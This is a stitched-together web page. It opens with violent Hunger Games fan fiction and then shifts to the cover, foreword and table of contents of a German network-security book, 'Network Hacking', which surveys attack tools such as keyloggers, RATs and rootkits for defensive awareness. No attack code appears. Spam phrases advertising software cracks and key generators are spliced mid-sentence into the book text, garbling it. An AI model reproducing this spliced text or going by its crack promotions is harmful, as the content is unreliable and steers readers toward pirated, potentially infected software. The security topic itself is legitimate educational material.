Four tributes are in the same platform as I. Two of them are to my right, two to my left. When we first arrived they all looked around at each other but now they don't give anyone a second look. We're all just focused on what must be done.

I take a shaky breath as a signal lamp that hangs above the near track suddenly lights up. A frown crosses my face but three of the tributes surrounding me take it as a sign that the Duel has begun.

They spring off of their platforms like rabbits, not bothering with me and the small girl who have remained motionless. They don't hear the rumbling that comes from the dark tunnel, they don't listen to the flashing light on the signal lamp as it bleeps and bloops rapidly.

Their ignorance is death.

A train comes speeding out from the tunnel. One of the high-tech ultra trains that we of District 6 build for the Capitol. It can travel up to speeds beyond three hundred miles per hour. Those poor tributes never had a chance.

One second they're racing across the track, the next they're swallowed by the train. I cry out in horror as I hear the terrible sounds of cracking bones and ripping flesh. Squirts of red spew out from under the train, splashing my face and making me gag, sickened by the sight. Then, only mere seconds later, the train disappears back down the opposite tunnel.

There's hardly anything left of the tributes who ran. There's just bits of torn flesh and fragments of bone. A slimy, crimson grist sticks to the tracks and the station reeks of fresh blood and death.

Ding! Ding! Ding!

Three separate chimes go off, three faces in the sky blank out. Illegal Drugs (302), Belladonna Saware (300) and Blondie Genesis (326) no longer live. Only seven tributes left.

Despite the horror that now swims in my thoughts I force myself to run forward. Death is coming and I need to be proactive to avoid it. The scraps of bloody flesh left behind by the train squish under by feet as I sprint across the track towards the center platform. I try not to vomit as I scrabble up onto the platform.

Another boy comes from the opposite side. He's tall and lean, a wiry sort of boy that always looks like he's about to flee. Except he doesn't flee; He instead runs for the table. I'm not fast enough to reach it before him. His long legs give him ample time to arrive at the square wooden table and pluck his desired weapon off of it. A steering wheel.

Wait.

A steering wheel?!

My mouth falls open in shock and then I shake my head furiously to clear my thoughts. The table only holds items that pertain to our District. Only things like tire irons, gears, pipes, and a whole sort of other stuff that I don't recognize. But I'm still confused. Why'd he pick a steering wheel?

The heavy wheel smashes down onto the crown of my head. In my confusion the boy had closed the gap between us and now beats me down with the wheel. It's a better weapon then it looks. I roll into a kneeling position and throw a punch at the boy's thigh. He blocks of but then I throw ny hands around his waist and pull him towards me. He goes flipping over my head and lands in the pit of the train tracks, very much alive but now covered with a bloody red grist.

Not my problem, I think. The table is still there with the weapons and I plunge towards it, my hands wrapping around the first thing I lay eyes on. But I haven't even had time to pull it towards me when a heavy object slams into the back of my skull.

Wolbert Toonico (325th Games)

Cosmo (300) doesn't utter a sound as my tire iron slams into his skull. The wound leaves no blood but there's a dent in his head, such a deep dent that I have no doubt that he will die, if he hasn't already.

It's a terribly sad sight, seeing that poor boy lying lifeless on the table, slowly sliding back to the ground. He didn't deserve this. None of us do. But it's what we've got, what we have to deal with. Kill or be killed. That's just what has to happen.

I hate myself for rationalizing the murder I just committed.

Источник: https://thehungergames.fandom.com/wiki/User_blog:LightStone123/400th_Annual_Hunger_Games
Category: Operating System, Computer Network Security, Computer Security Exploits, Computing, Technology

Share Embed Donate

Report this link



Short Textaloud 4 serial key - Crack Key For U Ein Guide, um sich gegen Hackerangriffe zu verteidigen.

Description

60030-9 U1+U4:Layout 1

31.03.2010

16:13 Uhr

Seite 1

Know-how ist blau.

Dr. Peter Kraft/Andreas Weyert Dr. Peter Kraft/Andreas Weyert

Aus dem Inhalt: • Die Werkzeuge für Angriff und Verteidigung

2. aktualisierte Auflage

• Keylogger – jeder Tastendruck wird registriert • Digitale Dietriche – Passwortknacker

• Proxys und Socks – digitale Tarnkappen • PC-Fernsteuerungen: Remote-Access-Tools • Rootkits – die versteckte Bedrohung Windows 10 Loader Crack With Torrent Free Download 2021 [Latest] Schnüffelnasen im Netz: Scanner und Sniffer

Wer seine Daten schützen will, muss die Einbruchswerkzeuge und die Methoden der potenziellen Diebe kennen. In dieser komplett überarbeiteten Neuauflage des Beststellers „Network Hacking“ beschreiben die Autoren Dr. Peter Kraft und Andreas Weyert die Tools und Vorgehensweisen der Datenpiraten und zeigen effektive Schutzmaßnahmen. So erfahren Sie unter anderem, wie Hacker Malware mit Rootkits verbergen und wie Sie sich dagegen wehren, wie Sie Ihr Heimnetzwerk effektiv absichern und welche Sicherheitsrichtlinien in Unternehmen wirklich greifen.







Die Tools der Cracker und Datenpiraten Nur wer weiß, wie Hacking-Tools funktionieren, kann sich auch dagegen schützen. Minutiös stellen die Autoren die gesamte Bandbreite der Werkzeuge vor und demonstrieren, wie Keylogger die Eingaben ahnungsloser Benutzer mitschneiden, Passwort-Cracker Zugangskennungen knacken, Remote-Access-Tools PCs in Zombies verwandeln und Rootkits Malware verstecken. Motive und Strategien der Angreifer Kein Datenpirat ist wie der andere. Ihre Motivation und ihre Methoden zu verstehen, ist ein wichtiger Schritt zum effektiven Selbstschutz. Die Autoren schildern in sieben Szenarien, wie Datendiebe vorgehen und welche Schwächen der Netzwerkinfrastruktur sie dafür ausnutzen. Denn wer physischen Zugang zu einem Rechner hat, geht anders vor als jemand, der ein WLAN hacken oder eine Denial-of-Service-Attacke starten will. Ausgehend vom jeweiligen Bedrohungsszenario, stellen die Autoren konkrete Abwehrstrategien vor. So befestigen Sie Ihr Netzwerk Die Autoren geben fundierte Empfehlungen für eine proaktive Sicherheitsstrategie. Viele Schritte sind sogar kostenlos möglich, so etwa die Überprüfung des Sicherheitsstatus oder das Abschalten nicht benötigter Dienste auf Windows-PCs. Darüber hinaus erhalten Sie leicht nachvollziehbare Ratschläge für die Auswahl von geeigneten Security-Tools und für das Erstellen wirksamer Sicherheitsrichtlinien in Unternehmen.

• Angriffstools für drahtlose Netze • Die Angreifer und ihre Motive • Szenario I: Geklaute Daten • Szenario II: Verwanzte PCs • Szenario III: Angriffe durch Portscanner & Co. • Szenario IV: Defacements und D(D)oS-Angriffe • Szenario V: Gehacktes WLAN • Szenario VI: Malware-Attacke aus dem Internet • Szenario VII: Angriffe von innen • Wirkungsvolle Vorsorgestrategien bei privaten Netzwerken • Effektive Schutzmaßnahmen für Firmennetze

Über die Autoren: Dr. Peter Kraft ist Geschäftsführer von synTeam Dr. Kraft & Partner. Seit mehr als zehn Jahren berät er Kunden in Fragen der Organisationsentwicklung und -optimierung. Er ist Autor mehrerer erfolgreicher Bücher zum Thema IT-Sicherheit und NLP. Andreas Weyert ist Wondershare Filmora Crack Consultant der buw consulting GmbH. Als Spezialist für die Themen Security Management, Informationssicherheit, PenetrationTesting und Datenschutz ist er vom BSI lizenzierter IT-Grundschutz-Auditor und zertifizierter Teamleiter für ISO-27001Audits.

Auf www.buch.cd Feature-Listen und Bedienparameter der im Buch vorgestellten Hacking-Tools.

49,95 EUR [D] ISBN 978-3-645-60030-9

Besuchen Sie unsere Website

www.franzis.de

Network Hacking

Professionelle Angriffs- und Verteidigungstechniken gegen Hacker und Datendiebe

• Die Horchposten: Portscanner

Kraft Weyert

Network Hacking

Professionelle Angriffs- und Verteidigungstechniken gegen Clip studio crack reddit - Free Activators und Datendiebe

2. aktualisierte Auflage

Network Hacking Professionelle Angriffs - und Verteidigungstechniken gegen Hacker und Datendiebe > Tools für Angriff und Verteidigung – vom Keylogger bis zum Rootkit > Vorbeugung gegen Malware-Attacken aus dem Internet > Effektive Schutzmaßnahmen für Privat- und Firmennetze

60030-9 Titelei:X

31.03.2010

16:06 Uhr

Seite 1

Dr. Peter Kraft/Andreas Weyert

Network Hacking

60030-9 Titelei:X

31.03.2010

16:06 Uhr

Seite 3

Dr. Peter Kraft / Andreas Weyert

Network Hacking Professionelle Angriffs- und Verteidigungstechniken gegen Hacker und Datendiebe 2. aktualisierte Auflage

Mit 395 Abbildungen

60030-9 Titelei:X

31.03.2010

16:06 Uhr

Seite 4

Bibliografische Information der Deutschen Bibliothek Die Deutsche Bibliothek verzeichnet diese Publikation in der Deutschen Nationalbibliografie; detaillierte Daten sind im Internet über http://dnb.ddb.de abrufbar.

Alle Veritas backup exec 20.3 crack - Crack Key For U in diesem Buch wurden vom Autor mit größter Sorgfalt erarbeitet bzw. zusammengestellt und unter Einschaltung wirksamer Kontrollmaßnahmen reproduziert. Trotzdem sind Fehler nicht ganz auszuschließen. Der Verlag und der Autor sehen sich deshalb gezwungen, darauf hinzuweisen, dass sie weder eine Garantie noch die juristische Verantwortung oder irgendeine Haftung für Folgen, die auf fehlerhafte Angaben zurückgehen, übernehmen können. Für die Mitteilung etwaiger Fehler sind Verlag und Autor jederzeit dankbar. Internetadressen oder Versionsnummern stellen den bei Redaktionsschluss verfügbaren Informationsstand dar. Verlag und Autor übernehmen keinerlei Verantwortung oder Haftung für Veränderungen, die sich aus nicht von ihnen zu vertretenden Umständen ergeben. Evtl. beigefügte oder zum Download angebotene Dateien und Informationen dienen ausschließlich der nicht gewerblichen Nutzung. Eine gewerbliche Nutzung ist nur mit Zustimmung des Lizenzinhabers möglich.

© 2010 Franzis Verlag GmbH, 85586 Poing Alle Rechte vorbehalten, auch die der fotomechanischen Wiedergabe und der Speicherung in elektronischen Medien. Das Erstellen und Verbreiten von Kopien auf Papier, auf Datenträgern oder im Internet, insbesondere als PDF, ist nur mit ausdrücklicher Genehmigung des Verlags gestattet und wird widrigenfalls strafrechtlich verfolgt. Die meisten Produktbezeichnungen von Hard- und Software sowie Firmennamen und Firmenlogos, die in diesem Werk genannt werden, sind in der Regel gleichzeitig auch eingetragene Warenzeichen und sollten als solche betrachtet werden. Der Verlag folgt bei den Produktbezeichnungen im Wesentlichen den Schreibweisen der Hersteller.

Satz: DTP-Satz A. Kugge, München art & design: www.ideehoch2.de Druck: Bercker, 47623 Kevelaer Printed in Germany ISBN 978-3-645-60030-9

5

Vorwort Als wir im Jahre 2007 die Erstausgabe unseres Buches auf den Markt brachten, konnten wir nicht ahnen, dass ihm ein – für ein Fachbuch – so beachtlicher Erfolg zuteilwerden würde. Ende 2009 drängte uns der Programmleiter der Professional Series des Franzis Verlags, Herr Graser – dem wir an dieser Stelle Dank sagen möchten für seine Unterstützung und sein Verständnis –, uns doch bitte recht bald für eine überarbeitete Neuauflage zu rüsten. Leider erwies sich diese Überarbeitung und Ergänzung als aufwendiger, als wir dachten. Einmal mehr bestätigte sich das Urteil, dass die IT-Branche – und damit untrennbar verbunden der Bereich IT-Security – zu den innovativsten Bereichen unserer Gesellschaft zählt. Nur wenig konnte beim Alten bleiben; die meisten der hier dargestellten und eingesetzten Programme haben mindestens ein neues Finish erhalten – von neuen Funktionalitäten mal ganz abgesehen. Andere Produkte der Dark Scene sind aus dem Untergrund verschwunden bzw. die alten Bezugsadressen haben sich geändert. Auch dem mussten wir nachgehen. Nicht zu vergessen ist, dass sich die Windows-Jünger seit Juni 2009 mit einem neuen Betriebssystem – Windows 7 – anfreunden dürfen, welches mit wesentlich höherer Zustimmung als der Vorgänger Vista vom Markt begrüßt wurde. Auch wenn es zum aktuellen Zeitpunkt (März 2010) erst selten in Unternehmen anzutreffen ist, sahen wir uns dennoch dazu genötigt, es hier ebenfalls zu berücksichtigen. Und was hat sich in den letzten drei Jahren nicht alles geändert? Neben zahlreichen Datenschutzskandalen haben beispielsweise unsere Volksvertreter kein sonderlich gutes Händchen im Rahmen der digitalen Gesetzgebung bewiesen – übrigens zum wiederholten Male – beginnend von der Online-Durchsuchung, dem Zugangserschwerungsgesetz bis hin zur Vorratsdatenspeicherung. Zuerst einmal die gute Nachricht: Das unsägliche Gesetz zur Vorratsdatenspeicherung wurde jüngst vom BVerfG gekippt – ein Schritt in die richtige Richtung, wie wir finden. Soweit wir beurteilen konnten, hat das neu in Kraft getretene Computerstrafrecht nicht zwangsläufig dazu geführt, dass der Einsatz von IT-Infrastruktur-Tools wie Sniffer, Port-Scanner oder Security-Scanner aus Open-Source-Quellen nennenswert kriminalisiert wurde – wenn auch zahlreiche Autoren die Konsequenzen zogen und ihre Entwicklungen vom Markt nahmen oder in das benachbarte Ausland flüchteten (erwähnenswert an dieser Stelle u. a. The Hacker's Choice, Phenoelit oder die Website von KisMAC). Stiller Dank gilt an dieser Stelle im Übrigen mutigen Chefredakteuren1 und Unternehmen2, die sich seitens des Staates nicht einschüchtern lassen und zur Selbstanzeige greifen oder bewusst das Risiko einer Klage eingehen. Auf der anderen Seite ist das Bedrohungsniveau (Daten- und Identitätsdiebstahl, systematisches Ausspähen von Firmenmitarbeitern) sowie die Zunahme von Drive-by1

www.heise.de/newsticker/meldung/Hacker-Paragraf-iX-Chefredakteur-zeigt-sich-selbst-an-191403.html

2

www.darkreading.com/security/government/showArticle.jhtml?articleID=208804747

6

Vorwort

Downloads kontinuierlich gestiegen: Millionen von fremd- und ferngesteuerten PCs bedrohen unabhängigen Berichten zufolge die Internet-Community. Mehr als 500 000 Rechner werden Tag für Tag neu infiziert3. Was uns wider Erwarten nicht erreichte, waren Vorwürfe, wir munitionierten Leute mit Angriffs-Know-how. Dazu fällt uns spontan eine nette Geschichte ein. Wer je einen wenig talentierten Schlüsseldienst bei der Arbeit beobachtet hat, hat sich vielleicht schon gefragt, ob er nicht selbst mit dem Stemmeisen Ähnliches erreicht hätte. Nun, wir durften einmal einem Treffen von Lockpickern4 (»Schlossknackern«) beiwohnen, die zum Hobby selbst komplizierteste Schlösser überwanden – nicht mit Brachialgewalt, sondern mit Köpfchen und mit minimal invasiven Mitteln. Was wir hier gelernt haben, war nicht die Aufsperrtechnik zum Öffnen fremder Schlösser, sondern ein differenziertes Verständnis für Schlösser und wie lange sie welchen Angriffen standhalten. Das Erste, was Leute nach einer solchen Session tun, ist, neue Schlösser anzuschaffen und einzubauen. Genau das ist der didaktische Zweck dieses Buches. Wir möchten interessierten Laien wie auch IT-Praktikern vorstellen, wie »böse Buben« in fremde Rechner und Netze eindringen – nicht, um sie selbst zu »bösen Buben« zu machen, sondern um sie für zusätzliche Sicherheitsmaßnahmen zu sensibilisieren. Versierten Cyberkriminellen sagen wir mit diesem Buch nichts Neues, und die oft geschmähten Script-Kiddies mögen vielleicht an wenigen Stellen profitieren, finden im Internet aber erheblich brisantere Informationen als hier. Richtig profitieren werden aber alle, die motiviert sind, sich easeus partition master crack 2019 - Activators Patch und vor allem gezielter für die Sicherheit ihrer Rechner und Netze zu engagieren. Ein Hinweis am Rande: Im Weiteren verwenden wir der Einfachheit halber den Begriff »Hacker« als Synonym für einen Computerkriminellen. Wir sind uns der Tatsache bewusst, dass der Begriff »Hacker« grundsätzlich wertneutral ist und dass es verschiedene Formen der Interpretation gibt (so beispielsweise bei Steven Levy5 und Bruce Schneier6). Keineswegs möchten wir denjenigen zu nahe treten, die sich selbst als »Hacker« bezeichnen und beispielsweise als Kernel-Hacker in der Linux-Community mitwirken. An der bewährten Struktur unseres Buches hielten wir fest. Das Tools-Kapitel hat uns bei der Überarbeitung mit die meiste Mühe gekostet: Wir mussten prüfen, was sich verändert hat, ob der neu hinzugekommene Funktionsumfang die redaktionelle Überarbeitung rechtfertigt, ob die Tools auch unter Windows 7 oder aktuellen Linux-Kerneln laufen etc. pp. Auch bei der Darstellung der Angriffsszenarien, speziell in den Bereichen WLAN und Firmennetze, sind neue Angriffstools bzw. -techniken zum Zuge gekommen. Wir hoffen, dass wir damit, wenigstens für die kommenden zwei Jahre, wieder auf der Höhe der Zeit sind.

3

www.computerwoche.de/security/1846557/

4

www.lockpicking.org/SSDeV/start.php

5

www.stevenlevy.com/index.php/other-books/hackers

6

www.schneier.com/blog/archives/2006/09/what_is_a_hacke.html

Vorwort

7

Teil I – Hacking-Tools Wir haben für dieses Buch die gewohnte dreiteilige Gliederung beibehalten. Im ersten Teil stellen wir gängige Hacking-Werkzeuge vor, wobei wir bewusst darauf verzichtet haben, zwischen Malware-Tools und klassischer bzw. kommerzieller Security-Software zu unterscheiden. Die vorgestellten Tools ermöglichen meistens beides: sowohl Angriffsvorbereitung und -durchführung als auch Erkennen bzw. Abwehr von Schwachstellen und Sicherheitslücken. Die Tools-Sektion hat darüber hinaus durch die gewählte Systematik den Charakter eines Nachschlagewerks. Durch die Beschreibung des Anwendungszwecks, von Bezugshinweisen, Kosten und Installationshinweisen kann jeder abschätzen, wie nützlich und brauchbar das eine oder andere Werkzeug für seine Zwecke ist. Vollständigkeit haben wir bewusst nicht angestrebt. Dennoch glauben wir, damit einen guten Querschnitt über die gängigsten Tools der Hacker wie ihrer Gegenspieler bieten zu können.

Teil II – Angriff und Abwehr Der zweite Teil unseres Buchs ist der ausführlichste. Hier beschreiben wir im Detail, wie typische Angriffsszenarien aussehen können. Angriffsobjekte sind Rechner mit einer Netzwerkanbindung, im einfachsten Fall ein kleineres Heimnetzwerk. Wir zeigen natürlich auch, wie Firmennetzwerke und Internetpräsenzen mit den eingangs vorgestellten Tools penetriert werden können. Die Szenarien sind so gewählt, dass sie auch von Nichtprofis praktisch nachvollzogen werden können. Allerdings sollte man als Leser ein Grundverständnis für die Netzwerk-Basics mitbringen. Wem beispielsweise die Unterschiede zwischen HTTP, FTP, TCP/IP, UDP etc. nicht recht geläufig sind, der wird hier eine grundlegende Erläuterung vermissen und sollte sich an anderer Stelle noch ein wenig einlesen. Auf der anderen Seite beschäftigen wir uns auch nicht damit, wie man Exploits, Trojaner oder Rootkits entwickelt – wir zeigen, wie sie funktionieren und wie man sie in bestimmten Situationen anwendet. An dieser Stelle auch die obligatorische Warnung: Sie als Leser sind auf jeden Fall für die Folgen Ihres Tuns selbst verantwortlich. Wer ein Netzwerk scannt, das nicht sein eigenes ist, bewegt sich in einer rechtlichen Grauzone. Wer sich durch einen Passwortcrack ein Login auf einem fremden Rechner erschleicht, eine bestehende Schwäche ausnutzt, um dort eine Remote-Shell zu etablieren, oder anderen Usern einen getarnten Keylogger schickt, ist definitiv auf der anderen Seite und kollidiert mit dem Strafgesetzbuch. Alle Angriffsszenarien enden übrigens mit einem Abschnitt, der sich der Abwehr genau dieser zuvor beschriebenen, spezifischen Angriffstechnik widmet. Dies soll noch einmal klar belegen, dass wir kein Hackertraining anbieten, sondern für Hackangriffe und ihre Abwehr sensibilisieren wollen.

Teil III – Vorsorge Im dritten Teil geht es um das grundsätzliche Thema Prävention & Prophylaxe. Proaktives Sicherheitsmanagement ist gleichermaßen ein Thema sowohl für den Betreiber privater Netze als auch den Verantwortlichen kleinerer und mittlerer Firmennetze.

9

Inhaltsverzeichnis Teil I: Tools – Werkzeuge für Angriff und Verteidigung. 17 1

Keylogger – Spionage par excellence. 19 1.1 Logkeys . 20 1.2 Elite Keylogger . 20 1.3 Ardamax Keylogger . 22 1.4 Stealth Recorder Pro . 23 1.5 Elite Keylogger V.1 . 24 1.6 Hardware-Keylogger . 24 1.7 Abwehr – generelle Tipps. 26

2

Passwort-Knacker: Wo ein Wille ist, ist auch ein Weg . 29 2.1 CMOSPwd . 29 2.2 Hydra . 30 2.3 Medusa. 32 2.4 VNCrack . 34 2.5 PWDUMP (in unterschiedlichen Versionen bis PWDUMP7) . 35 2.6 John the Ripper . 36 2.7 OphCrack. 37 2.8 SAMInside . 38 2.9 Cain & Abel . 39 2.10 L0phtcrack. 40 2.11 Distributed Password Recovery . 41 2.12 Offline NT Password & Registry Editor. 41 2.13 PW-Inspector (Hydra-Suite) . 42 2.14 Abwehr – generelle Tipps. 42

3

An den Toren rütteln: Portscanner & Co. 45 3.1 Nmap. 46 3.2 Lanspy . 48 3.3 AW Security Portscanner . 49 3.4 Winfingerprint . 50 3.5 Xprobe2 . 51 3.6 p0f . 53 3.7 Abwehr – generelle Tipps. 54

10

Inhaltsverzeichnis

4

Proxy & Socks. 55 4.1 FreeCap. 56 4.2 Proxy Finder . 57 4.3 Abwehr – generelle Tipps. 58

5

Remote Access Tools (RAT) – Anleitung für Zombie-Macher . 59 5.1 Atelier Web Remote Commander . 59 5.2 Poison Ivy . 60 5.3 Turkojan. 61 5.4 Optix Pro. 62 5.5 Abwehr – generelle Tipps. 63

6

Rootkits – Malware stealthen . 65 6.1 Oddysee_Rootkit. 66 6.2 Hacker_Defender . 67 6.3 Abwehr – generelle Tipps. 68

7

Security-/Vulnerability-Scanner. 69 7.1 X-NetStat Professional . 69 7.2 GFI LANguard N.S.S. . 70 7.3 Nessus. 71 7.4 Open Vulnerability Assessment System / OpenVAS . 73 7.5 Nikto2. 75 7.6 w3bfukk0r . 77 7.7 Abwehr – generelle Tipps. 77

8

Sniffer: Die Schnüffler im Netzwerk. 79 8.1 dsniff (dsniff-Suite) . 80 8.2 mailsnarf (dsniff-Suite) . 81 8.3 urlsnarf (dsniff-Suite) . 83 8.4 arpspoof (dsniff-Suite) . 84 8.5 PHoss . 85 8.6 Driftnet . 86 8.7 Ettercap / Ettercap NG. 87 8.8 tcpdump . 88 8.9 Wireshark . 89 screen recorder Serial key - Free Activators Abwehr – generelle Tipps. 90

9

Sonstige Hackertools. 93 9.1 Metasploit Framework (MSF) . 93 9.2 USBDUMPER 2 . 94 9.3 USB Switchblade / 7zBlade . 95 9.4 Net Tools. 96 9.5 Troll Downloader. 97

Inhaltsverzeichnis

9.6 9.7 9.8 9.9 9.10 9.11 9.12 9.13 9.14

11

Czybik Gen Creation Kit . 98 WMF-Maker. 99 fEvicol. 100 0x333shadow . 101 Logcleaner-NG . 102 NakedBind. 104 Ncat (Nmap-Suite) . 105 GNU MAC Changer (macchanger) . 106 Abwehr – generelle Tipps. 107

10 Wireless Hacking . 109 10.1 Kismet-Newcore . 110 10.2 Aircrack-NG (Aircrack-NG-Suite) . 111 10.3 Aireplay-NG (Aircrack-NG-Suite) . 112 10.4 Airodump-NG (Aircrack-NG-Suite). 113 10.5 Airbase-NG (Aircrack-NG-Suite) . 114 10.6 coWPAtty . 115 10.7 Pyrit . 116 10.8 MDK3. 117 10.9 Vistumbler . 118 10.10 Abwehr – generelle Tipps. 120 Teil II: Angriffsszenarien und Abwehrmechanismen. 121 11 Die Angreifer und ihre Motive . 123 11.1 Die Motive. 123 11.1.1 Rache. 123 11.1.2 Geltungssucht. 123 11.1.3 Furcht . 124 11.1.4 Materielle Interessen . 124 11.1.5 Neugierde . 125 11.2 Die Angreifer . 125 11.2.1 Hacker . 126 11.2.2 Script-Kiddies . 127 11.2.3 IT-Professionals . 128 11.2.4 Normalanwender und PC-Freaks. 128 12 Szenario I: Datenklau vor Ort . 131 12.1 Zugriff auf Windows-PCs . 131 12.1.1 Erkunden von Sicherheitsmechanismen . 131 12.1.2 Überwinden der CMOS-Hürde. 132 12.1.3 Das Admin-Konto erobern . 134 12.2 Zugriff auf Linux-Rechner . 141 12.2.1 Starten von Linux im Single-User-Mode. 142

12

Inhaltsverzeichnis

12.2.2 Starten von einem Linux-Boot-Medium . 146 12.2.3 Einbinden der zu kompromittierenden Festplatte in ein Fremdsystem . 147 12.3 Abwehrmaßnahmen gegen einen physischen Angriff von außen . 148 12.4 Zwei-Faktoren-Authentifizierung. 150 12.4.1 iKey 2032 von SafeNet . 150 12.4.2 Chipdrive Smartcard Office . 153 12.4.3 Security Suite. 156 13 Szenario II: Der 4k Video Downloader 4.16.4.4300 Crack With License Key Free Download ist verwanzt. 159 13.1 Software-Keylogger . 161 13.1.1 Ausforschen von Sicherheitseinstellungen. 161 13.1.2 Festlegen des Überwachungsumfangs . 161 13.1.3 Installation des Keyloggers . 162 13.1.4 Sichten, Bewerten und Ausnutzen der gewonnenen Daten. 165 13.1.5 Die Audio-Wanze. 165 13.2 Big Brother im Büro. 167 13.3 Abwehrmaßnahmen gegen Keylogger & Co. . 169 14 Szenario III: Spurensucher im Netz . 175 14.1 Google-Hacking. 176 14.1.1 Angriffe . 176 14.1.2 Abwehrmaßnahmen. 185 14.2 Portscanning, Fingerprinting und Enumeration. 187 14.2.1 Portscanning. 187 14.2.2 Fingerprinting und Enumeration . 202 14.2.3 Security Scanner . 206 14.3 Abwehrmaßnahmen gegen Portscanner & Co. 212 15 Szenario IV: Web Attack . 219 15.1 Defacements. 219 15.2 XSS-Angriffe. 219 15.3 Angriff der Würmer . 219 15.4 DoS- und DDoS-Attacken. 220 15.5 Ultima Ratio – Social Engineering oder Brute Force?. 228 15.6 Sicherheitslücken systematisch erforschen . 231 15.6.1 AccessDiver . 231 15.6.2 Spuren verwischen mit ProxyHunter . 233 15.6.3 Passwortlisten konfigurieren. 237 15.6.4 Wortlisten im Eigenbau . 239 15.6.5 Websecurity-Scanner: Paros. 241 15.6.6 Websecurity-Scanner: WVS . 243 15.6.7 Websecurity-Scanner: Wikto . 246

Inhaltsverzeichnis

13

15.7 Abwehrmöglichkeiten gegen Webattacken. 252 15.7.1 .htaccess schützt vor unbefugtem Zugriff . 253 16 Szenario V: WLAN-Attacke. 257 16.1 Aufspüren von Funknetzen. 259 16.1.1 Hardwareausstattung für Wardriving . 259 16.1.2 Vistumbler für Windows . 261 16.1.3 Kismet-Newcore für Linux. 266 16.2 Kartografierung von Funknetzen. 279 16.2.1 Kartografierung von Funknetzen mit Google Maps. 280 16.2.2 Kartografierung von Funknetzen mit Google Earth und Vistumbler . 282 16.2.3 Kartografierung von Funknetzen mit Google Earth und KismetNewcore. 285 16.3 Angriffe auf Funknetze . 288 16.3.1 Zugriff auf ein offenes WLAN . 289 16.3.2 Zugriff auf ein WLAN, dessen Hotspot keine SSID sendet . 290 16.3.3 Zugriff auf ein WLAN, das keinen DHCP-Dienst anbietet . 292 16.3.4 Zugriff auf ein mit MAC-Filter gesichertes WLAN . 297 16.3.5 Zugriff auf ein WEP-verschlüsseltes WLAN. 302 16.3.6 Zugriff auf ein WPA2-verschlüsseltes WLAN. 316 16.3.7 WLAN mon amour – Freu(n)de durch Funkwellen. 326 16.4 Sicherheitsmaßnahmen bei Wireless LAN . 335 17 Szenario VI: Malware-Attacke aus dem Internet . 339 17.1 Angriffe via E-Mail . 340 17.1.1 Absendeadresse fälschen . 340 17.1.2 Phishen nach Aufmerksamkeit. 343 17.1.3 Der Payload oder Malware aus dem Baukasten . 346 17.1.4 Massenattacken und Spam-Schleudern . 351 17.1.5 Office-Attacken . 353 17.1.6 Kampf der Firewall . 356 17.2 Rootkits . 361 17.2.1 Test-Rootkit Unreal. 363 17.2.2 AFX-Rootkit . 365 17.3 Die Infektion . 367 17.3.1 Experiment 1: Rechnung.pdf.exe . 368 17.3.2 Experiment 2: bild-07_jpg.com . 370 17.4 Drive-by-Downloads . 373 17.5 Schutz vor (un)bekannten Schädlingen aus dem Netz. 378 17.5.1 Mailprogramm und Webbrowser absichern . 379 17.5.2 Pflicht: Malware- und Antivirenscanner . 381 17.5.3 Malware-Abwehr mit Sandboxie. 384 17.5.4 Allzweckwaffe Behavior Blocker & HIPS . 386

14

Inhaltsverzeichnis

18 Szenario VII: Netzwerkarbyten: Wenn der Feind innen hackt . 391 18.1 Der Feind im eigenen Netzwerk . 391 18.2 Zugriff auf das LAN. 392 18.3 Passives Mitlesen im LAN: Sniffing. 394 18.3.1 Tcpdump. 396 18.3.2 Wireshark . 400 18.3.3 Ettercap NG. 402 18.3.4 DSniff-Suite . 413 18.3.5 Driftnet . 424 18.3.6 P0f . 424 18.3.7 ARPSpoof. 427 18.4 Scanning: »Full Contact« mit dem LAN . 430 18.4.1 Xprobe2 . 431 18.4.2 Nmap. 435 18.4.3 Open Vulnerability Assessment System / OpenVAS . 443 18.5 Der Tritt vors Schienbein: Exploits. 450 18.5.1 wunderbar_emporium. 451 18.5.2 2009-lsa.zip / Samba < 3.0.20 heap overflow. 457 18.5.3 Metasploit Framework. 461 18.6 Hurra, ich bin root – und nun?. 489 18.7 Windows-Rechner kontrollieren . 489 18.7.1 Integration von Schadsoftware. 496 18.8 Linux unter Kontrolle: Rootkits installieren . 498 18.8.1 evilbs. 500 18.8.2 Mood-NT . 504 18.8.3 eNYeLKM. 509 18.9 Linux unter Kontrolle: Spuren verwischen mit LogfileCleaner . 514 18.10 Linux unter Kontrolle: Keylogger. 519 18.11 Linux unter Kontrolle: Password-Cracking . 521 18.11.1 John the Ripper . 522 18.11.2 ophcrack. 523 18.11.3 Medusa. 525 18.11.4 Hydra . 527 18.12 Schutz vor Scannern, Exploits, Sniffern & Co. 530 Teil III: Prävention und Prophylaxe . 533 19 Private Networking . 535 19.1 Sicherheitsstatus mit MBSA überprüfen. 535 19.2 Überflüssige Dienste. 541 19.3 Vor »Dienstschluss« Abhängigkeiten überprüfen . 543 19.4 Alle Dienste mit dem Process Explorer im Blick . 544 19.5 Externer Security-Check tut Not . 546

Inhaltsverzeichnis

19.6 19.7 19.8

15

Malware-Check . 548 Risiko: Mehrbenutzer-PCs und Netzwerksharing . 564 Schadensbegrenzung: Intrusion Detection & Prevention . 572

20 Company Networking. 577 20.1 Basiselemente zur Unternehmenssicherheit . 582 20.2 Teilbereich Infrastruktur und Organisation . 583 20.3 Teilbereich Personal. 585 20.4 Teilbereich Technik . 588 Stichwortverzeichnis . 593

17

Teil I: Tools – Werkzeuge für Angriff und Verteidigung Wir stellen hier einige Tools vor, mit denen man relativ schräge Dinge machen kann. Aber denken Sie daran: Wenn Sie unsere Experimente praktisch nachvollziehen wollen, sollten Sie vorab einige Sicherheitsüberlegungen anstellen. Der wichtigste Punkt betrifft Ihre eigene Sicherheit. Etliche der hier vorgestellten Tools fallen, zumindest aus der Sicht von Virenscannern, ziemlich eindeutig in die Kategorie Malware. Praktisch gesprochen: Allein schon auf der Suche nach den Tools gehen Sie das Risiko ein, infiziert zu werden. Da viele dieser Tools nur im Darknet zu finden sind, wissen Sie nie genau, ob sie nicht mehr Funktionalität bereithalten, als Ihnen lieb sein dürfte. Wenn Sie jetzt denken, dass Sie prinzipiell sehr gut gerüstet sind und die besten und neuesten Antimalware-Tools, Firewalls etc. installiert haben, kommt schon die nächste Ernüchterung. Die meisten Hackertools lassen sich nur dann zur Zusammenarbeit bewegen, wenn Sie Ihr Visier hochklappen, d. h. aktivierte Firewalls wie Zonealarm Pro oder aktivierte Online-Virenwächter werden Ihnen im schlimmsten Fall die Schädlinge schneller löschen, als Sie diese aus dem Internet runterladen; mindestens aber werden sie Sie wirkungsvoll vom Experimentieren abhalten und entsprechende Aktionen der Hackertools deaktivieren. Halten Sie das 